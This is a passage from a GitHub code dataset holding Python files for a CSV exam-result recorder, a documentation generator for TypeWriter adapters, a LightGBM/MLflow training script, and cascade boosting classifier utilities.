should be .csv')\n\ndef create_new_file(file_name):\n with open(file_name, 'w', newline='') as new_file:\n new_file_writer = csv.writer(new_file, delimiter=',')\n new_file_writer.writerow(FIELD_NAMES)\n print(f\"New file {file_name}, created.\")\n\ndef check_for_duplicate_record(file_name, result):\n with open(file_name, 'r', newline='') as result_file:\n result_file_reader = csv.DictReader(result_file)\n for row in result_file_reader:\n if row['name'] == result['name'] and row['dob'] == result['dob'] and row['subject'] == result['subject']:\n raise SystemExit('Result already exists.')\n\ndef write_new_record(file_name, result):\n with open(file_name, 'a', newline='') as result_file:\n result_file_writer = csv.DictWriter(\n result_file, fieldnames=FIELD_NAMES)\n result_file_writer.writerow(result)\n print(f\"New record added:\\n{result}\")\n\ndef get_percentage(result):\n percentage = (result['score'] / result['total']) * 100\n \n return round(percentage, 2)\n\nparser = argparse.ArgumentParser(description=STORE_RESULT_USAGE_EXAMPLE,\n formatter_class=argparse.RawDescriptionHelpFormatter)\nparser.add_argument(\"--name\",\n help=STORE_RESULT_NAME_HELP,\n required=True)\nparser.add_argument(\"--dob\", type=validate_date,\n help=STORE_RESULT_DOB_HELP,\n required=True)\nparser.add_argument(\"--subject\",\n choices=SUBJECT_CHOICES,\n help=STORE_RESULT_SUBJECT_HELP,\n required=True)\nparser.add_argument(\"--total\", type=int,\n help=STORE_RESULT_TOTAL_HELP,\n required=True)\nparser.add_argument(\"--score\", type=float,\n help=STORE_RESULT_SCORE_HELP,\n required=True)\nparser.add_argument(\"--store\",\n help=STORE_RESULT_STORE_HELP,\n required=True)\n\n\ndef main(result_dict):\n file_name = result_dict.pop('store')\n\n validate_score(result_dict)\n validate_file_type(file_name)\n\n result_dict['percentage'] = get_percentage(result_dict)\n\n if not pathlib.Path(file_name).exists():\n create_new_file(file_name)\n write_new_record(file_name, result_dict)\n return\n\n check_for_duplicate_record(file_name, result_dict)\n write_new_record(file_name, result_dict)\n\nif __name__ == \"__main__\":\n opts = parser.parse_args()\n\n main(opts.__dict__)\n","repo_name":"leapfrogtechnology/lf-training","sub_path":"Python/RanjanPaudel/task1/store_result.py","file_name":"store_result.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33697081530","text":"# This file is used for parsing TypeWriter adapter's source code and generating markdown files for the documentation website.\n# Please note that this code is not perfect and may require some manual editing to get the markdown files to look right.\n# This file should not need to be run directly or modified. It is run by the `generate_docs.bat` file inside each adapter folder.\n# (Not to mention this code is a rat's nest. Optimize at your own risk.)\n\nimport os\nimport re\nimport sys\n\nadapterName = \"\"\nadapterDesc = \"\" # Allows markdown\noutPathBase = \"\"\nentryPath = \"\"\n\nif len(sys.argv) == 5:\n adapterName = sys.argv[1]\n adapterDesc = sys.argv[2]\n outPathBase = os.path.abspath(sys.argv[3])\n entryPath = os.path.abspath(sys.argv[4])\n print(outPathBase)\n print(entryPath)\nelse:\n print(\n \"Usage: python parse.py [adapter name] [adapter description] [out path] [entry path]\")\n exit()\n\n\ndef titleCase(str):\n return \" \".join([word[0].upper() + word[1:] for word in str.split(\" \")])\n\n\ndef titleCaseSpaced(str):\n newStr = \" \".join([word[0].upper() + word[1:] for word in str.split(\"_\")])\n return re.sub('([A-Z])', r' \\1', newStr).strip()\n\n\ndef plural(str):\n if str.endswith(\"y\"):\n return str[:-1] + \"ies\"\n elif str.endswith(\"s\"):\n return str\n return str + \"s\"\n\n\ndef getEntryData(data, root, file):\n entryData = {}\n\n # Section\n entryData[\"section\"] = titleCase(\n root.replace(entryPath, \"\").split(\"\\\\\")[-1])\n\n if \"Gate\" in entryData[\"section\"]:\n entryData[\"section\"] = \"Action\"\n if \"Entities\" in entryData[\"section\"]:\n entryData[\"section\"] = \"Speaker\"\n\n # Fields\n entryData[\"fields\"] = []\n for i, line in enumerate(data.splitlines()):\n if line.startswith(\"@Entry(\"):\n entryData[\"name\"] = titleCaseSpaced(\n file).replace(\".kt\", \"\").replace(\" Entry\", \"\")\n entryData[\"fileName\"] = line.split('\"')[1]\n entryData[\"description\"] = line.split('\"')[3].replace(\n f\"[{adapterName.replace(' ', '').replace('Adapter', '')}] \", \"\")\n\n if line.startswith(\"\toverride val\") or line.startswith(\" override val\"):\n line = line.replace(\"override \", \"\")\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\"\tval\") or line.startswith(\" val\"):\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\"\tprivate val\") or line.startswith(\" private val\"):\n line = line.replace(\"private \", \"\")\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\") :\"):\n break\n\n if not entryData:\n return None\n return entryData\n\n\ndef getField(data, line, i):\n field = {}\n\n field[\"name\"] = line.strip().split(\" \")[1].replace(\":\", \"\")\n if (field[\"name\"] == \"id\" or field[\"name\"] == \"name\"):\n return None\n\n field[\"name\"] = titleCaseSpaced(field[\"name\"])\n field[\"name\"] = field[\"name\"].strip()\n\n field[\"type\"] = line.strip().split(\" \")[2].replace(\"Optional\", \"\").replace(\"List\", \"\").replace(\n \"<\", \"\").replace(\">\", \"\").replace(\",\", \"\")\n field[\"optional\"] = \"Optional\" in line\n\n if (\"Trigger\" in field[\"name\"]):\n if (\"Custom\" in field[\"name\"]):\n field[\"name\"] = \"Triggers\"\n field[\"type\"] = \"Trigger\"\n elif (\"Speaker\" in field[\"name\"]):\n field[\"type\"] = \"Speaker\"\n\n desc = data.splitlines()[i-1]\n field[\"description\"] = \"\"\n if \"@Help\" in desc:\n field[\"description\"] = desc.split('\"')[1]\n else:\n if \"Trigger\" in field[\"name\"]:\n return None\n elif \"Criteria\" in field[\"name\"]:\n return None\n elif \"Modifiers\" in field[\"name\"]:\n return None\n elif \"Display Name\" in field[\"name\"]:\n return None\n elif \"Speaker\" in field[\"name\"]:\n field[\"description\"] = \"The speaker of the dialogue\"\n elif \"Sound\" in field[\"name\"] and field[\"description\"] == \"\":\n return None\n elif \"Command\" in field[\"name\"] and field[\"description\"] == \"\":\n field[\"description\"] = \"The command to register. Do not include the leading slash.\"\n elif \"Comment\" in field[\"name\"] and field[\"description\"] == \"\":\n return None\n elif field[\"description\"] == \"\":\n field[\"description\"] = \"No description provided\"\n print(\"No description found for field in \" + line.split(\" \")\n [1].replace(\":\", \"\") + \" (\" + field[\"name\"] + \")\")\n\n return field\n\n\ndef createMarkdown(data, root, file):\n entryData = getEntryData(data, root, file)\n if not entryData:\n print(\"No entry data found\")\n return None\n markdown = f\"\"\"import {{{plural(entryData['section'])}Field, EntryField}} from \"@site/src/components/EntryField\";\n\n# {entryData['name']}\n\n{entryData['description']}.\n\n## How could this be used?\n\n\n\n## Fields\n\n<{plural(\"Action\" if \"Dialogue\" in entryData[\"section\"] else entryData[\"section\"])}Field />\n\"\"\"\n for field in entryData[\"fields\"]:\n markdown += f\"\"\"\n\n {field[\"description\"]}\n\n\"\"\"\n return markdown\n\n\ndef main():\n skipFileExistsCheck = False\n noFileReplace = False\n\n if not os.path.exists(outPathBase):\n os.makedirs(outPathBase)\n if not os.path.exists(os.path.join(outPathBase, \"entries\")):\n os.makedirs(os.path.join(outPathBase, \"entries\"))\n\n text = f\"\"\"# {adapterName}\n{adapterDesc}\n\n## Entries\n\"\"\"\n sectionsWritten = []\n\n with open(os.path.join(outPathBase, \"_category_.yml\"), \"w\") as f:\n f.write(f\"label: {adapterName}\")\n\n with open(os.path.join(outPathBase + r\"\\entries\", \"_category_.yml\"), \"w\") as f:\n f.write(f\"label: Entries\")\n\n for root, dirs, files in os.walk(entryPath):\n if \"messengers\" in root:\n continue\n for file in files:\n print(\"--------------------------------------\")\n outputPath = root.replace(entryPath, outPathBase + r\"\\entries\").replace(\n \"entities\", \"speaker\").replace(\"gate\", \"action\")\n\n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n\n with open(os.path.join(root, file), \"r\") as f:\n data = f.read()\n print(\"Parsing \" + file)\n try:\n markdown = createMarkdown(data, root, file)\n except Exception as e:\n print(f\"Failed to parse {file} ({e})\")\n continue\n if markdown:\n with open(os.path.join(outPathBase, adapterName.replace(\" \", \"\") + \".md\"), \"w\") as f:\n entry = getEntryData(data, root, file)\n\n outputFile = os.path.join(\n outputPath, entry[\"fileName\"] + \".mdx\")\n\n with open(os.path.join(outputPath, \"_category_.yml\"), \"w\") as f:\n f.write(\n f\"label: {plural(titleCaseSpaced(entry['section']))}\\n\")\n\n if entry[\"section\"] not in sectionsWritten:\n text += f\"\"\"\n### {entry[\"section\"]}\n\n| Name | Description |\n| ---- | ----------- |\"\"\"\n sectionsWritten.append(entry[\"section\"])\n\n text += f\"\"\"\n| [{entry[\"name\"]}]({adapterName.replace(\" \", \"\")}/entries/{entry[\"section\"].lower()}/{entry[\"fileName\"]}) | {entry[\"description\"]} |\"\"\"\n try:\n if not os.path.exists(outputFile):\n # if os.path.exists(os.path.join(outputPath, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\"))):\n # print(\n # f'auto renaming file ({os.path.join(outputPath, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\"))} -> {outputFile})')\n # os.rename(os.path.join(outputPath, file.replace(\n # \".kt\", \".mdx\").replace(\"Entry\", \"\")), outputFile)\n # continue\n # ^^ This was a hacky way to quickly rename the files. Just keeping this in case something goes wrong\n with open(outputFile, \"w\") as f:\n f.write(markdown)\n else:\n if not skipFileExistsCheck and not noFileReplace:\n yn = input(\n f\"File already exists: {file.replace('.kt', '.mdx')}. Replace? (y/N/all/none) \")\n elif skipFileExistsCheck:\n yn = \"y\"\n print(\n f\"File already exists: {file.replace('.kt', '.mdx')}, replacing\")\n elif noFileReplace:\n yn = \"n\"\n print(\n f\"File already exists: {file.replace('.kt', '.mdx')}, skipping\")\n if yn.lower() == \"y\":\n print(\"Replacing file\")\n pass\n elif yn.lower() == \"all\":\n skipFileExistsCheck = True\n elif yn.lower() == \"none\":\n noFileReplace = True\n print(\"Skipping file\")\n continue\n elif yn.lower() == \"\":\n print(\"Skipping file\")\n continue\n else:\n print(\"Skipping file\")\n continue\n with open(outputFile, \"w\") as f:\n f.write(markdown)\n except Exception as e:\n print(\n f\"Error writing {file}, putting at base directory ({e})\")\n with open(os.path.join(outPathBase, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\")), \"w\") as f:\n f.write(markdown)\n continue\n with open(os.path.join(outPathBase, adapterName.replace(\" \", \"\") + \".md\"), \"w\") as f:\n f.write(text)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MultiverShaun/TypeWriter","sub_path":"documentation/docs/adapters/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":10836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
+{"seq_id":"2461761863","text":"import click\nimport pandas as pd\nimport joblib as jb\nimport lightgbm as lgb\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nimport json\nfrom typing import List\nimport mlflow\nfrom mlflow.models.signature import infer_signature\nimport os\nfrom dotenv import load_dotenv\nfrom mlflow.tracking import MlflowClient\n\nload_dotenv()\n\nremote_server_uri = os.getenv(\"MLFLOW_TRACKING_URI\")\nmlflow.set_tracking_uri(remote_server_uri)\n\nFEATURES = ['price', 'geo_lat', 'geo_lon', 'building_type', 'level', 'levels',\n 'area', 'kitchen_area', 'object_type', 'year', 'month',\n 'level_to_levels', 'area_to_rooms', 'cafes_0.012', 'cafes_0.08']\n\n\n@click.command()\n@click.argument(\"input_paths\", type=click.Path(exists=True), nargs=2)\n@click.argument(\"output_path\", type=click.Path(), nargs=2)\ndef train(input_paths: List[str], output_path: List[str]):\n \"\"\"\n Train the model and log params, metrics and artifacts in MLflow\n :param input_paths: train (for [0]) and test (for [1]) dataframes\n :param output_path: model (for [0]) and score (for [1]) artifact's path\n :return:\n \"\"\"\n with mlflow.start_run():\n mlflow.get_artifact_uri()\n\n train_df = pd.read_csv(input_paths[0])\n test_df = pd.read_csv(input_paths[1])\n\n x_train = train_df.drop('price', axis=1)\n y_train = train_df['price']\n x_holdout = test_df.drop('price', axis=1)\n y_holdout = test_df['price']\n lgb_train = lgb.Dataset(x_train, y_train)\n lgb_eval = lgb.Dataset(x_holdout, y_holdout, reference=lgb_train)\n params = {\n 'boosting_type': 'gbdt',\n 'objective': 'regression',\n 'metric': {'l1'},\n 'max_depth': 11,\n 'num_leaves': 130,\n 'learning_rate': 0.25,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.9,\n 'n_estimators': 1000,\n 'bagging_freq': 2,\n 'verbose': -1\n }\n\n gbm = lgb.train(params,\n lgb_train,\n num_boost_round=200,\n valid_sets=lgb_eval,\n verbose_eval=False,\n early_stopping_rounds=30) # categorical_feature=['building_type']\n jb.dump(gbm, output_path[0])\n\n y_predicted = gbm.predict(x_holdout, num_iteration=gbm.best_iteration)\n score = dict(\n mae=mean_absolute_error(y_holdout, y_predicted),\n rmse=mean_squared_error(y_holdout, y_predicted)\n )\n\n with open(output_path[1], \"w\") as score_file:\n json.dump(score, score_file, indent=4)\n\n signature = infer_signature(x_holdout, y_predicted)\n\n mlflow.log_params(params)\n mlflow.log_metrics(score)\n mlflow.lightgbm.log_model(lgb_model=gbm,\n artifact_path=\"model\",\n registered_model_name=\"real_estate_lgbm\",\n signature=signature)\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"SolovyevEvgeniy/DS_project_mlops","sub_path":"src/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5849061056","text":"import os\nimport re\nimport random\nimport numpy as np\nfrom sklearn import preprocessing\nfrom cascade_util import __pred_weakclf, __weval, __w_beta_update, __save_weakclf, __load__weakclf\nimport operator\nimport functools\nimport pandas as pd\nfrom sklearn.metrics import *\nfrom sklearn.metrics import cohen_kappa_score\n\n\ndef calc_cm_rcall(y_test, y_pred):#\n\n ct = pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)\n\n # Compute confusion matrix\n cm = confusion_matrix(y_test, y_pred)\n \n accuracy = sum(cm[i,i] for i in range(len(set(y_test))))/sum(sum(cm[i] for i in range(len(set(y_test)))))\n recall_all = sum(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test)))) for i in range(len(set(y_test))))/(len(set(y_test)))\n precision_all = sum(cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test)))) for i in range(len(set(y_test))))/(len(set(y_test)))\n fscore_all = sum(2*(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test)))))*(cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test)))))/(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test))))+cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test))))) for i in range(len(set(y_test))))/len(set(y_test))\n \n TP = cm[1,1]\n FP = cm[0,1]\n TN = cm[0,0]\n FN = cm[1,0]\n # Precision for Positive = TP/(TP + FP)\n prec_pos = TP/(TP + FP)\n\n recall_pos = TP/(TP+FN)\n\n # F1 score for positive = 2 * precision * recall / (precision + recall)….or it can be F1= 2*TP/(2*TP + FP+ FN)\n f1_pos = 2*TP/(TP*2 + FP+ FN)\n # TPR = TP/(TP+FN)\n TPR = cm[1,1]/sum(cm[1,j] for j in range(len(set(y_test))))\n # FPR = FP/(FP+TN)\n FPR = cm[0,1]/sum(cm[0,j] for j in range(len(set(y_test))))\n # specificity = TN/(FP+TN)\n Specificity = cm[0,0]/sum(cm[0,j] for j in range(len(set(y_test))))\n MCC = matthews_corrcoef(y_test, y_pred)\n CKappa = cohen_kappa_score(y_test, y_pred)\n\n # w_acc = (TP*20 + TN)/ [(TP+FN)*20 + (TN+FP)] if 20:1 ratio of non-feeding to feeding\n ratio = (TN+FP)/(TP+FN)\n w_acc = (TP*ratio + TN)/ ((TP+FN)*ratio + (TN+FP))\n\n return prec_pos, recall_pos, f1_pos, TPR, FPR, Specificity, MCC, CKappa, w_acc, cm\n\n\ndef rm_files_in_folder(folder):\n# remove files in folder\n import os, shutil\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path): \n shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef list_files_in_directory(mypath):\n\n return [f for f in os.listdir(mypath) if os.path.isfile(os.path.join(mypath, f))]\n\n\n\n# def read_raw_acc_separate_files(meal, rec, winsize):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# allfiles = list_files_in_directory(folder)\n# file_header = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_'\n# RegExr= file_header+'\\d+.txt'\n# matches = [re.search(RegExr, f) for f in allfiles]\n# files = ([m.group() for m in matches if m])\n\n# # files = [files[0], files[1]]\n# XY = [np.loadtxt(os.path.join(folder, file), delimiter=\",\", unpack=False) for file in files]\n# XY = np.vstack(XY)\n# return XY\n\n\n\n# def read_haar_feat_raw_separate_files(meal, rec, winsize):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# allfiles = list_files_in_directory(folder)\n# file_header = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_'\n# RegExr= file_header+'\\d+.txt'\n# matches = [re.search(RegExr, f) for f in allfiles]\n# files = ([m.group() for m in matches if m])\n\n# # files = [files[0], files[1]]\n# XY = [np.loadtxt(os.path.join(folder, file), delimiter=\",\", unpack=False) for file in files]\n# XY = np.vstack(XY)\n# return XY\n\n\n\n# def read_haar_feat_random_select_samples(meal, rec, winsize, ratio, use_seed):\n# # ratio: negative to positive samples\n\n# if isinstance(meal,str):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# pos_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_pos.txt'\n# neg_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_neg.txt'\n# XYPos = np.loadtxt(os.path.join(folder, pos_file), delimiter=\",\", unpack=False)\n# XYNeg = np.loadtxt(os.path.join(folder, neg_file), delimiter=\",\", unpack=False)\n# if use_seed: random.seed(1)\n# rand_ind = random.sample(range(0, XYNeg.shape[0]), XYPos.shape[0]*ratio)\n# XYNeg = XYNeg[rand_ind, :]\n\n# XY = np.vstack((XYPos, XYNeg))\n\n# elif isinstance(meal,list):\n# meals = meal\n# XYs = []\n# for meal in meals:\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# pos_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_pos.txt'\n# neg_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_neg.txt'\n# XYPos = np.loadtxt(os.path.join(folder, pos_file), delimiter=\",\", unpack=False)\n# XYNeg = np.loadtxt(os.path.join(folder, neg_file), delimiter=\",\", unpack=False)\n# if use_seed: random.seed(1)\n# rand_ind = random.sample(range(0, XYNeg.shape[0]), XYPos.shape[0]*ratio)\n# XYNeg = XYNeg[rand_ind, :]\n\n# XY = np.vstack((XYPos, XYNeg))\n# XYs.append(XY)\n# XY = np.vstack(XYs)\n\n# return XY\n\n\n\ndef build_strongclf_def_thres(XY, T, mdlpath, verbose = 0):\n \"\"\"\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n Save\n ----\n model\n f_opt_ind: feature index\n beta\n \"\"\"\n\n # re-order negative and positive samples to match the weight vector\n\n first_time_flag = 1\n\n XYNeg = XY[np.where(XY[:,-1]==0)[0],:]\n XYPos = XY[np.where(XY[:,-1]==1)[0],:]\n XY = np.vstack((XYNeg, XYPos))\n\n y_label = XY[:,-1]\n\n nsamples = XYNeg.shape[0]\n psamples = XYPos.shape[0]\n samples = nsamples + psamples\n \n # number of features\n n_feats = XY.shape[1]-1\n f_list = list(range(n_feats))\n\n if verbose: print('f_list: ', f_list)\n\n if not os.path.exists(mdlpath):\n os.makedirs(mdlpath)\n else:\n rm_files_in_folder(mdlpath)\n \n f_opt_list = []\n \n betas = np.zeros([T])# keep record of all betas in all rounds\n\n if verbose: w_norm_rec = np.zeros([T, samples])\n\n # initialize weights\n w = np.zeros([samples])\n w[:nsamples] = 1/nsamples\n w[nsamples:] = 1/psamples\n\n\n # Iteration\n for t in range(T):\n\n # 1. normalize weights\n w_norm = preprocessing.normalize(w[:,np.newaxis], axis=0, norm = 'l1')\n\n if verbose: print(w_norm)\n if verbose: w_norm_rec[t,:] = w_norm.reshape((1,-1)) # w_norm record\n\n err = np.ones(n_feats)\n\n # for each feature:\n for f in f_list:\n\n # 2. train a classifier h using a single feature.\n w_norm = w_norm.ravel() \n y_pred = __pred_weakclf(XY[:,f].reshape(-1, 1), y_label, w_norm)\n\n # error calculation\n err[f] = __weval(y_label, y_pred, w_norm)\n\n if first_time_flag:\n first_time_flag = 0\n if verbose > 1: \n print('err: ', err)\n print(sorted(range(len(err)), key=lambda k: err[k]))\n\n # 3. choose the classifier with lowest error\n f_opt_ind = np.argmin(err)\n if verbose and t%(T/10): print('f_opt_ind: ',f_opt_ind) \n\n errmin = np.amin(err) \n if verbose and t%(T/10) == 0: print('errmin: ',errmin) \n\n f_opt_list.append(f_opt_ind)\n\n # 4. update weights\n w, betas = __w_beta_update(betas, t, errmin, w_norm, samples, y_label, y_pred)\n\n __save_weakclf(XY[:,np.argmin(err)].reshape(-1, 1), \\\n y_label, \\\n os.path.join(mdlpath,str(t)+'.sav'), \\\n f_opt_ind, \\\n betas[t],\\\n os.path.join(mdlpath,str(t)+'_conf.txt'), \\\n w_norm)\n\n feat_list = sorted(range(len(err)), key=lambda k: err[k])\n\n if verbose: \n print('f_opt_list: ', f_opt_list) \n print('err: ', err)\n print(feat_list)\n\n return betas, feat_list\n\n\n\ndef load_strongclf_def_thres(XY, T, mdlpath, verbose = 0):\n \"\"\"\n Load weak classifier and build final strong classifier with default threshold \n after training with training set.\n threshold is not adjustable.\n\n the models are './model/(i).sav'\n\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n \"\"\"\n\n \n# load and get weak classifiers result\n y_pred_rec = np.zeros([T, XY.shape[0]])\n y_res = np.zeros(XY.shape[0])\n X = XY[:,:-1]\n betas = np.zeros([T])# keep record of all betas in all rounds\n\n for t in range(T):\n h, feat, betas[t] = __load__weakclf(os.path.join(mdlpath,str(t)+'.sav'), \\\n os.path.join(mdlpath,str(t)+'_conf.txt'))\n\n if verbose:\n print('feat: ',feat)\n print('X[:,feat]:', X[:,feat])\n y_pred = h.predict(X[:,int(feat)].reshape(-1, 1))\n y_pred_rec[t,:] = y_pred\n \n# calc classifier threshold\n betas_recip = np.reciprocal(betas)\n alphas = np.log(betas_recip)\n clf_thres = np.sum(alphas)*0.5\n \n y_comb = np.dot(alphas, y_pred_rec)\n \n# get final result\n\n for i in range(y_comb.shape[0]):\n if y_comb[i] < clf_thres:\n y_res[i] = 0\n else:\n y_res[i] = 1\n \n return y_res, clf_thres\n\n\n\ndef load_strongclf_adj_thres(XY, T, clf_thres, mdlpath):\n \"\"\"\n Final strong classifier with adjustable threshold\n\n Load weak classifier and build final strong classifier with adjustable threshold \n after training with training set.\n\n the models are './model/(i).sav'\n\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n \"\"\"\n\n\n\n# load and get weak classifiers result\n y_predRec = np.zeros([T, XY.shape[0]])\n y_res = np.zeros(XY.shape[0])\n X = XY[:,:-1]\n betas = np.zeros([T])# keep record of all betas in all rounds\n\n for t in range(T):\n h, feat, betas[t] = __load__weakclf(os.path.join(mdlpath,str(t)+'.sav'),\\\n os.path.join(mdlpath,str(t)+'_conf.txt'))\n yPred = h.predict(X[:,feat].reshape(-1, 1))\n y_predRec[t,:] = yPred\n \n# calc classify threshold\n betas_recip = np.reciprocal(betas)\n alphas = np.log(betas_recip)\n \n y_comb = np.dot(alphas, y_predRec) \n \n# print(y_comb)\n\n for i in range(y_comb.shape[0]):\n if y_comb[i] < clf_thres:\n y_res[i] = 0\n else:\n y_res[i] = 1\n \n return y_res\n\ndef update_trnset_with_P_samples(XY, y_res):\n # ind_list = []\n # for i in range(len(y_res)):\n # if y_res[i] == 1:\n # ind_list.append(i)\n # P = XY[ind_list,:]\n P = XY[np.where(y_res==1)[0],:]\n\n return P\n\n\ndef updateTrnsetWithFPtrueSamples(XYCurrTrn, yRes):\n yLabel = XYCurrTrn[:,-1]\n indList = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n \n N = XYCurrTrn[indList,:]\n P = XYCurrTrn[np.where(XYCurrTrn[:,-1]==1)[0],:]\n\n XYTrn = np.vstack((P,N))\n\n return XYTrn\n \n\n\ndef update_trnset_with_FP_true_samples(XYCurrTrn, yRes):\n yLabel = XYCurrTrn[:,-1]\n indList = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n \n N = XYCurrTrn[indList,:]\n P = XYCurrTrn[np.where(XYCurrTrn[:,-1]==1)[0],:]\n\n XYTrn = np.vstack((P,N))\n\n return XYTrn\n \n\n\ndef update_index_trnset_with_FP_true_samples(XYCurrTrn, yRes):\n yLabel = XYCurrTrn[:,-1]\n FP_ind_list = []\n \n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n FP_ind_list.append(i)\n \n index = FP_ind_list + np.where(XYCurrTrn[:,-1]==1)\n\n return index\n \n\n\ndef update_XY_with_FP_P_samples(XYPosTrn, yRes, XYTestNFeat):\n yLabel = XYTestNFeat[:,-1]\n indList = []\n\n for i in range(len(yRes)):\n if yRes[i] == 1 and yLabel[i]==0:\n indList.append(i)\n print(indList)\n N = XYTest[indList,:]\n N_stage0 = N\n\n P = XYPosTrn\n XYTrn = np.vstack((P,N))\n\n print(len(XYTrn))\n\n return XYTrn\n\n\ndef update_XY_with_N_feats(XYTrn, featList, nFeats):\n# select first n features in featList for training set\n feats = featList[:nFeats]\n XYTrn_nfeats = np.hstack((XYTrn[:,feats], XYTrn[:,-1].reshape([-1,1])))\n\n return XYTrn_nfeats\n\n\n# SHOULE BE REMOVED, REPLACED BY update_XY_with_N_feats\ndef XYTrnUpdateWithTopNFeats(XYTrn, featList, nFeats):\n# select first n features in featList for training set\n feats = featList[:nFeats]\n XYTrnNFeat = np.hstack((XYTrn[:,feats], XYTrn[:,-1].reshape([-1,1])))\n\n return XYTrnNFeat\n\n\n\ndef test_cascade_all_stages_keep_true_samples(XY, T_list, all_feat_list, n_feats_list, beta_list, thres_list, path_list):\n \"\"\"\n GT Positive samples P keep going through the full stages\n True negative samples are dropped out\n \"\"\"\n\n # initialization\n stages = len(T_list)\n F_list = []\n D_list = []\n\n # for-loop\n for stage in range(stages):\n # select XY with selected features to update XY\n XY_stage = update_XY_with_N_feats(XY, all_feat_list, n_feats_list[stage])\n y_res = load_strongclf_adj_thres(XY_stage, T_list[stage], thres_list[stage], path_list[stage])\n _, D, _, _, F, _, _, _, _, _ = calc_cm_rcall(XY[:,-1], y_res)\n\n # update dataset\n XY = update_trnset_with_FP_true_samples(XY, y_res)\n \n F_list.append(F)\n D_list.append(D)\n\n F_final = functools.reduce(operator.mul, F_list, 1)\n D_final = functools.reduce(operator.mul, D_list, 1)\n\n return F_list, D_list, F_final, D_final, XY\n\n\n\n\ndef test_cascade_all_stages_real_run(XY, T_list, all_feat_list, n_feats_list, beta_list, thres_list, path_list):\n \"\"\"\n All positive samples go into the next stage,\n all negative samples are dropped out\n \"\"\"\n\n # initialization\n stages = len(T_list)\n F_list = []\n D_list = []\n\n # for-loop\n for stage in range(stages):\n # select XY with selected features to update XY\n XY_stage = update_XY_with_N_feats(XY, all_feat_list, n_feats_list[stage])\n y_res = load_strongclf_adj_thres(XY_stage, T_list[stage], thres_list[stage], path_list[stage])\n _, D, _, _, F, _, _, _, _, _ = calc_cm_rcall(XY[:,-1], y_res)\n\n # update dataset\n XY = update_trnset_with_P_samples(XY, y_res)\n\n F_list.append(F)\n D_list.append(D)\n\n F_final = functools.reduce(operator.mul, F_list, 1)\n D_final = functools.reduce(operator.mul, D_list, 1)\n\n return F_list, D_list, F_final, D_final, y_res\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zsb87/Cascade","sub_path":"module/cascade_func.py","file_name":"cascade_func.py","file_ext":"py","file_size_in_byte":15323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
